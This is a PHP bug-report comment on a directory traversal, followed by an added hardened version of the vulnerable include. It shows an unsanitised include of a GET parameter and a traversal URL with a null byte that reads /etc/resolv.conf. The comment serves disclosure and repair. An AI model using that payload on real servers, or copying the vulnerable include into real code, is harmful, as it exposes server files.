I reproduced the same effect using webroot /var/www file test.php:

    <?php
    if($_GET["pageID"]) $pageID=$_GET["pageID"];
    include('page.'.$pageID.'.inc');
    ?>

http://myserver/test.php?pageID=/../../../etc/resolv.conf%00

filesystem is ext3 on a local harddrive

--
PHP 5.2.4-2ubuntu5.9 Possible exploit using directory traversal
https://bugs.launchpad.net/bugs/491835
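
A hardened form of the include from the test.php in the report, added here as an example; it is not code from the bug report or from the PHP package. PAGE_DIR, resolve_page() and the 'home' default are assumed names and values.

```php
<?php
// Added example: hardened form of the test.php include from the report.
// PAGE_DIR and resolve_page() are hypothetical names, not from the bug.
define('PAGE_DIR', '/var/www/pages');   // assumed location of page.*.inc files

function resolve_page($pageID)
{
    // Only plain strings; ?pageID[]=x would otherwise arrive as an array.
    if (!is_string($pageID)) {
        return false;
    }
    // Strict allowlist: no '/', '.', or NUL (the decoded %00) can pass.
    // \z rather than $ so a trailing newline is not accepted.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $pageID)) {
        return false;
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/page.' . $pageID . '.inc');
    // realpath() returns false for missing files and resolves symlinks,
    // so the prefix check confirms the target really sits inside PAGE_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    return $path;
}

// 'home' is an assumed default page for requests without pageID.
$pageID = isset($_GET['pageID']) ? $_GET['pageID'] : 'home';
$path = resolve_page($pageID);
if ($path === false) {
    header('HTTP/1.1 404 Not Found');
    exit;
}
include $path;
```

With this check the request shown in the report fails the allowlist and gets a 404 before any path is built, regardless of how the interpreter treats the NUL byte.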